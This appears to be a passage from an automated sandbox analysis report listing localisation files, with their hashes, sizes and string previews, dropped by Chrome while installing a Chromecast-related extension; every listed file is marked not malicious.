                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": "... .. ........ ......... ...... ...-..... ....... ..?".. },.. "128276876460319075": {.. "message": "......... .. ..........".. },.. "1428448869078126731": {.. "message": "........ .. .........".. },.. "1522140683318860351": {.. "message": "........... .. .. ........ ...., ........ .......".. },.. "1550904064710828958": {.. "message": "......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": ".... .. .....".. },.. "1850397500312020388": {.. "message": "....... .. ............ .. Chromecast . $START_LINK$............ Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "p
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\bn\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19695
                                                                                                                                                                                                                        Entropy (8bit):5.315564774032776
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:PrUCrcTIOeswIW/Vre/sZn8TFfzheV6uml:lPswIWtoK8xfG6uml
                                                                                                                                                                                                                        MD5:F9DDF525C07251282A3BFFCEE9A09ABB
                                                                                                                                                                                                                        SHA1:A343A078E804AF400A8F3E1891E3390DA754A5CD
                                                                                                                                                                                                                        SHA-256:C69C6C90F7EB8F10685CD815AF1F6F1B87CF30C4E8D95DF1D577DE1105AAD227
                                                                                                                                                                                                                        SHA-512:EBD339C37162984672513019D470B92DF8B743DD69D4430361EF12D42FD1C208DBDE818A7BFE20BE8A7D63CD6E02B3F4344DEA1C4AEDB8719D789981A49DA44C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".... ...".. },.. "1213957982723875920": {.. "message": "..... ....... ..... ........... ...... ....... ...... ...?".. },.. "128276876460319075": {.. "message": "...... ........".. },.. "1428448869078126731": {.. "message": "...... ......... ...".. },.. "1522140683318860351": {.. "message": "..... .... ...... ....... ... ... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": "$START_LINK$ Google
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15518
                                                                                                                                                                                                                        Entropy (8bit):5.242542310885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:drGUBKxMF2ayv8FrIccUVFmwf+7d9VKS3V6uml:dCUBKxMFBy0FE3UzmQ+zkSl6uml
                                                                                                                                                                                                                        MD5:A90CF7930E7C3BEC61EE252DEFAD574A
                                                                                                                                                                                                                        SHA1:F630CA01114A7BDD39607CB84B8280CCE218A5C6
                                                                                                                                                                                                                        SHA-256:A533740E17559E2ADF40B4555C60F21EEC84E92C09CDBC19EED033A0B4DD2474
                                                                                                                                                                                                                        SHA-512:598F991B344FA6724617D6CE57BB0D6D64EF86B4F5317BF6AD5EDF43E6B0A385094E7885F7A8FA2B107405B31C3D9F76E92315BC1D9BB52ACD4ECAD342917DE1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Es congela".. },.. "1213957982723875920": {.. "message": "Quina de les opcions.seg.ents descriu millor la vostra xarxa?".. },.. "128276876460319075": {.. "message": "Detecci. de dispositius".. },.. "1428448869078126731": {.. "message": "Flu.desa del v.deo".. },.. "1522140683318860351": {.. "message": "S'ha produ.t un error en la connexi.. Torneu-ho a provar.".. },.. "1550904064710828958": {.. "message": "Correcta".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Pots veure el Chromecast a l'$START_LINK$aplicaci. Google.Home$END_LINK$?$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15552
                                                                                                                                                                                                                        Entropy (8bit):5.406413558584244
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:eVdprJrG5efiTk93ebrxZR1fdc8VDCwT9fTV6c8TEKdl:2rMqiQerxQ88W7V6uml
                                                                                                                                                                                                                        MD5:17E753EE877FDED25886D5F7925CA652
                                                                                                                                                                                                                        SHA1:8E4EC969777CC0CEB7C12D0C1B9D87EBBB9C4678
                                                                                                                                                                                                                        SHA-256:C562FCCFCE374D446BFAC30AC9B18FF17E7A3EF101C919FF857104917F300382
                                                                                                                                                                                                                        SHA-512:33D61F6327FC81D7A45AA2CC97922DC527F5F43E54AA1A1638DA6EE407024A2F10CFD82CC5C3C581C2E7B216276987CB26C3FA95198572E139ACF29CC5B7ADCB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Video zamrz.".. },.. "1213957982723875920": {.. "message": "Kter. popis nejl.pe vystihuje va.i s..?".. },.. "128276876460319075": {.. "message": "Zji..ov.n. za..zen.".. },.. "1428448869078126731": {.. "message": "Plynulost videa".. },.. "1522140683318860351": {.. "message": "P.ipojen. se nezda.ilo. Zkuste to pros.m znovu.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "Perfektn.".. },.. "1802762746589457177": {.. "message": "Hlasitost".. },.. "1850397500312020388": {.. "message": "Vid.te sv.j Chromecast v.$START_LINK$aplikaci Google Home $END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15340
                                                                                                                                                                                                                        Entropy (8bit):5.2479291792849105
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:+Upr8XnI1MY2kPuir8j7Rd3kbTWc4QtV6c8TEKdl:FrJ1H9br8h6eZCV6uml
                                                                                                                                                                                                                        MD5:F08A313C78454109B629B37521959B33
                                                                                                                                                                                                                        SHA1:3D585D52EC8B4399F66D4BE88CED10F4A034FCCC
                                                                                                                                                                                                                        SHA-256:23BF7E5EDF70291CA6D8F4A64788C5B86379EECB628E3DFA7DD83344612F7564
                                                                                                                                                                                                                        SHA-512:9F2868AEBBF7F6167A7EA120FE65E752F9A65D1DC51072AA2413B2FDE374DA2D169D455A4788E341717F694179E6F1FA80413C080D9CD8CB397C3E84668CBFEC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket af f.lgende udsagn beskriver bedst dit netv.rk?".. },.. "128276876460319075": {.. "message": "Enhedsregistrering".. },.. "1428448869078126731": {.. "message": "Videostabilitet".. },.. "1522140683318860351": {.. "message": "Forbindelsen blev afbrudt. Pr.v igen.".. },.. "1550904064710828958": {.. "message": "Problemfri".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lydstyrke".. },.. "1850397500312020388": {.. "message": "Kan du se din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "STAR
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15555
                                                                                                                                                                                                                        Entropy (8bit):5.258022363187752
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:AJprM71A4qyJSwlk5KR5rtXsmvL0xhVw921YV6c8TEKdl:2re3jJS5A5rt8msA2KV6uml
                                                                                                                                                                                                                        MD5:980FB419ED6ED94AD75686AFFB4E4C2E
                                                                                                                                                                                                                        SHA1:871BFBCA6BCBA9197811883A93C50C0716562D57
                                                                                                                                                                                                                        SHA-256:585C7814AFD2453232BC940252D4AE821D6E6CBCFD74A793F78E5DB8BA5342F1
                                                                                                                                                                                                                        SHA-512:1681FA9C3BA882250A5005FB807D759EB8A634F1AA011725B1C865C0028BE7AB7BC16DC821A7F5BBFBA84C91E7D663ADE715284798E7E84E8FFF2D254488882D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "H.ngenbleiben".. },.. "1213957982723875920": {.. "message": "Welche dieser Aussagen beschreibt dein Netzwerk am besten?".. },.. "128276876460319075": {.. "message": "Ger.teerkennung".. },.. "1428448869078126731": {.. "message": "Videowiedergabequalit.t".. },.. "1522140683318860351": {.. "message": "Fehler beim Herstellen der Verbindung. Bitte versuche es noch einmal.".. },.. "1550904064710828958": {.. "message": "St.rungsfrei".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lautst.rke".. },.. "1850397500312020388": {.. "message": "Siehst du deinen Chromecast in der $START_LINK$Google Home App$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17941
                                                                                                                                                                                                                        Entropy (8bit):5.465343004010711
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:S0rDuhLh41cZrP3TzDBknbpgo6djIV6uml:S0fuBh46ZD3TzDinbpgoUK6uml
                                                                                                                                                                                                                        MD5:40EB778339005A24FF9DA775D56E02B7
                                                                                                                                                                                                                        SHA1:B00561CC7020F7FE717B5F692884253C689A7C61
                                                                                                                                                                                                                        SHA-256:F56BF7C171AA20038EE30B754478B69A98F3014C89362779B0A8788C7B9BEEE1
                                                                                                                                                                                                                        SHA-512:8BED281A33EC1E4E88A9F9D62BB13FE0266C0FAF8856D1DC2A843D26DD3CE5E7D1400FD3325ABD783B0364EC4FB1188AD941D56AEB9073BC365BE0D12DE6C013
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".... ... .. ........ .......... ........ .. ...... ...;".. },.. "128276876460319075": {.. "message": ".......... ........".. },.. "1428448869078126731": {.. "message": "......... ......".. },.. "1522140683318860351": {.. "message": "........ ......... ......... .....".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "...... ....".. },.. "1850397500312020388": {.. "message": "........ .. ..... .. Chromecast .... $START_LINK$........ Google Home$END_LINK$; $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14897
                                                                                                                                                                                                                        Entropy (8bit):5.197356586852831
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:2MKUOp5N7GTNMRuv6M0bIt3FXGkW6/5NkkQ9NJKJhnH3t9F410sUA+ISN6cGDSyR:VKzprogudTGkWqrKcJhdIR+V6c8TEKdl
                                                                                                                                                                                                                        MD5:8351AF4EA9BDD9C09019BC85D25B0016
                                                                                                                                                                                                                        SHA1:F6EC1FFD291C8632758E01C9EE837B1AD18D4DCF
                                                                                                                                                                                                                        SHA-256:F41C82D8A4F0E9B645656D630C882BE94A0FB7F8CEC0FE864B57298F0312B212
                                                                                                                                                                                                                        SHA-512:75672B57F21F38F97341AD76A199AD764E9FBAB2384D701BF6EB06CEFDE6C4F20F047F9051A4E30D99621E5C1FBBDB9E38E8D2B47470806704B38DA130A146CF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Freezes".. },.. "1213957982723875920": {.. "message": "Which of the following best describes your network?".. },.. "128276876460319075": {.. "message": "Device Discovery".. },.. "1428448869078126731": {.. "message": "Video Smoothness".. },.. "1522140683318860351": {.. "message": "Connection failed. Please try again.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Are you able to see your Chromecast in the $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15560
                                                                                                                                                                                                                        Entropy (8bit):5.236752363299121
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:NAgprfy1pTCukFr+1DIyDRoanvV6c8TEKdl:KMrq6FrmvV6uml
                                                                                                                                                                                                                        MD5:8A70C18BB1090AA4D500DE9E8E4A00EF
                                                                                                                                                                                                                        SHA1:8AFC097FA956C1317DB0835348B2DA19F0789669
                                                                                                                                                                                                                        SHA-256:FF173D1CEF665B1234E02F11070ABD2B65230318150734579A03C7F31B4AE3F4
                                                                                                                                                                                                                        SHA-512:140BAF40A4ABE9B8AF0855B0EBB7DFDF17869EDFC4EE1037C5EA7FDD8EDEBD4850E055B6A4D7B8782657618BCE1517813779BA01BA993CC838BB43E0BE71EEEE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Congelaci.n de im.genes".. },.. "1213957982723875920": {.. "message": ".Cu.l de las siguientes respuestas describe mejor tu red?".. },.. "128276876460319075": {.. "message": "Detecci.n de dispositivo".. },.. "1428448869078126731": {.. "message": "Fluidez del v.deo".. },.. "1522140683318860351": {.. "message": "Error en la conexi.n. Vuelve a intentarlo.".. },.. "1550904064710828958": {.. "message": "V.deo fluido".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volumen".. },.. "1850397500312020388": {.. "message": ".Puedes ver tu Chromecast en la $START_LINK$aplicaci.n Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15139
                                                                                                                                                                                                                        Entropy (8bit):5.228213017029721
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:Z48bxhWYp5Ny5M63niwAKD4rrJSJ2RkPXh9P5NFP2+NBMU01jewUEVez3QOiSevy:ikxprot3lYkf/rHBc0KsUV6c8TEKdl
                                                                                                                                                                                                                        MD5:A62F12BCBA6D2C579212CA2FF90F8266
                                                                                                                                                                                                                        SHA1:F7E964A2D9BBDA364252BCE5CFBA3FD34FDD825E
                                                                                                                                                                                                                        SHA-256:3EB3EB0B3B4A8E5A477D1B3C3A3891CCC7DC6B8879ECE243A7BD7C478068273D
                                                                                                                                                                                                                        SHA-512:E300201245C00ADEC8F39D586875F8FA4607AB203572BF3CE353C1CA7CDCA05B8786810CA0CEE27E4EA54A5EFD53690F1EA7AA4148CFF472A66BB11202723566
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Hangub".. },.. "1213957982723875920": {.. "message": "Milline j.rgmistest v.idetest kirjeldab k.ige paremini teie v.rku?".. },.. "128276876460319075": {.. "message": "Seadme tuvastamine".. },.. "1428448869078126731": {.. "message": "Video sujuvus".. },.. "1522140683318860351": {.. "message": ".hendamine eba.nnestus. Proovige uuesti.".. },.. "1550904064710828958": {.. "message": ".htlane".. },.. "1636686747687494376": {.. "message": "T.iuslik".. },.. "1802762746589457177": {.. "message": "Helitugevus".. },.. "1850397500312020388": {.. "message": "Kas n.ete oma Chromecasti $START_LINK$rakenduses Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fa\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17004
                                                                                                                                                                                                                        Entropy (8bit):5.485874780010479
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:rngaIprIX/t9wkjTJrs3hqaXxRQdiIMDnD+LhfHdoltV6c8TEKdl:4rin5rU1X7Qd0M9CtV6uml
                                                                                                                                                                                                                        MD5:852BD3CFF960F1BC3A2AAB3CB3874EF9
                                                                                                                                                                                                                        SHA1:C9F6F3C776542889FE3B67971D65ACFE048A3A0A
                                                                                                                                                                                                                        SHA-256:D87597B6C10364501B98AA42524843F109009CCEF022D8E0170440D7F144F4C6
                                                                                                                                                                                                                        SHA-512:2A7AE4D70E33E53EE31831CE2E61DD8DF103C4170EC483BDA14B8788E5DD536EEE84DBA340CACBDF16889C7E6465B48D82C4714E746E8A7B372D12CBDF371C95
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".... ... .......".. },.. "1213957982723875920": {.. "message": ".... .. .. ..... ... .... ... .. .. ...... ... ..... .......".. },.. "128276876460319075": {.. "message": "..... ......".. },.. "1428448869078126731": {.. "message": "..... .....".. },.. "1522140683318860351": {.. "message": "..... ...... .... ..... ...... ...... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..... ...".. },.. "1850397500312020388": {.. "message": ".... ......... Chromecast ... .. .. $START_LINK$ ...... Google Home$END_LINK$ ....... $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15268
                                                                                                                                                                                                                        Entropy (8bit):5.268402902466895
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:efMprYXiYUNpj5Coik1tXxrUhvUzSPWV6c8TEKdl:eIrjbjosdrU5WV6uml
                                                                                                                                                                                                                        MD5:3902581B6170D0CEA9B1ECF6CC82D669
                                                                                                                                                                                                                        SHA1:C8208AC2B1DD6D4F8BDAAE01C8BD71FFFA5A732B
                                                                                                                                                                                                                        SHA-256:D2A8180225A83A423BB6E17343DFA8F636D517154944002ED9240411B8C0C5E1
                                                                                                                                                                                                                        SHA-512:612FDD8A3C5051F0A4F1E11E50B5D124B337C77D62D987D35C2AF9E08AFC6AFCEBAEE8D40FDFBCD1E1889F39758B96FAECBF6C6D1CF146C741A5261952050221
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Pys.htyy".. },.. "1213957982723875920": {.. "message": "Mik. seuraavista kuvaa parhaiten verkkoasi?".. },.. "128276876460319075": {.. "message": "Laitteiden tunnistaminen".. },.. "1428448869078126731": {.. "message": "Videon tasaisuus".. },.. "1522140683318860351": {.. "message": "Yhteys ep.onnistui. Yrit. uudelleen.".. },.. "1550904064710828958": {.. "message": "Tasainen".. },.. "1636686747687494376": {.. "message": "T.ydellinen".. },.. "1802762746589457177": {.. "message": "..nenvoimakkuus".. },.. "1850397500312020388": {.. "message": "N.etk. Chromecastisi $START_LINK$Google Home .sovelluksessa$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15570
                                                                                                                                                                                                                        Entropy (8bit):5.1924418176212646
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:+esprzAsQp68wIJYkMyr2k0jR1/7Rr1uV6c8TEKdl:Gr78JDMyrR0tJuV6uml
                                                                                                                                                                                                                        MD5:59483AD798347B291363327D446FA107
                                                                                                                                                                                                                        SHA1:C069F29BB68FA7BA2631B0BF5BBF313346AC6736
                                                                                                                                                                                                                        SHA-256:DD47530EAE96346CD4DC3267A0BB1091BB17B704803A93CDA2E3E81551B94F12
                                                                                                                                                                                                                        SHA-512:091595CA135E965ED3DE376873541117F0E7A8EBDEB4714833EFDD6C820234373891BE5DEC437BA85CCB79CCCA053D407E6ADA17EBDAE7D313324A48775C0010
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Hindi gumagalaw".. },.. "1213957982723875920": {.. "message": "Alin sa sumusunod ang pinakamahusay na naglalarawan sa iyong network?".. },.. "128276876460319075": {.. "message": "Pagtuklas ng Device".. },.. "1428448869078126731": {.. "message": "Pagka-smooth ng Video".. },.. "1522140683318860351": {.. "message": "Hindi nakakonekta. Pakisubukang muli.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perpekto".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Nakikita mo ba ang iyong Chromecast sa $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15826
                                                                                                                                                                                                                        Entropy (8bit):5.277877116547859
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:nLZprAZg3EkV3sjrICe8L/1Va7lt1rlxLAkoYHHavV6c8TEKdl:vrW+2jrI7TdLAk3MV6uml
                                                                                                                                                                                                                        MD5:9B416146FE4F1403C2AACAC4DCF1A5C3
                                                                                                                                                                                                                        SHA1:616F055C9FAD4CE972DF82EC8A9B2F4EDA3E7FAD
                                                                                                                                                                                                                        SHA-256:7C7F5758F54008190ACCDDBD1761CBD980FB5FE0847E992874498228D2571DBC
                                                                                                                                                                                                                        SHA-512:6E8E70380A8C6E2C0587ADFF6AE36963EC76694904841CE1DFE4EEE215B917AD3E8AF727555627FBDF6B8BA6A4A0674D2B90AC4E9331B6628A32F4C4348FB51B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Se fige".. },.. "1213957982723875920": {.. "message": "Parmi les propositions suivantes, laquelle d.crit le mieux votre r.seau.?".. },.. "128276876460319075": {.. "message": "D.tection d'appareils".. },.. "1428448869078126731": {.. "message": "Fluidit. de la vid.o".. },.. "1522140683318860351": {.. "message": ".chec de la connexion. Veuillez r.essayer.".. },.. "1550904064710828958": {.. "message": "Fluide".. },.. "1636686747687494376": {.. "message": "Parfaite".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Votre Chromecast est-il visible dans l'$START_LINK$application Google.Home$END_LINK$.? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\gu\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19255
                                                                                                                                                                                                                        Entropy (8bit):5.32628732852814
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Hq2Mr+qPlJKYMdzKgXr3dGsGF+yAK37Wf7Cy/V6uml:KxzTVgX7ykj6uml
                                                                                                                                                                                                                        MD5:68B03519786F71A426BAC24DECA2DD52
                                                                                                                                                                                                                        SHA1:B8E6608932EC5CEC4BC3C5475BFC3E312D2E2E7D
                                                                                                                                                                                                                        SHA-256:C77A4D27E9E6CA25B9290056D93A656E3EBE975957E4C2EE9F0FB11B133D5CD4
                                                                                                                                                                                                                        SHA-512:5FFE06A10774877AF25E05BA07F3032CC52F874896D67E320F4EF9D524A22E40B462CC6206700E9557EB354FA2730172DC6912EBCA49C671FB0EF155B17F9EFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "........... .... ..... .......... ....... ..... ... ..?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": "........ ......".. },.. "1522140683318860351": {.. "message": "....... ...... ..... .... ..... ..... ...... ....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".......".. },.. "1850397500312020388": {.. "message": "... ... $START_LINK$ Google Home ..$END_LINK$... Chromecast..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19381
                                                                                                                                                                                                                        Entropy (8bit):5.328912995891658
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:zrGrSmhKy7KyY+bNEDqlQdrMEPxtShJV6uml:zBqG6QdwEPrW6uml
                                                                                                                                                                                                                        MD5:20C86E04B1833EA7F21C07361061420A
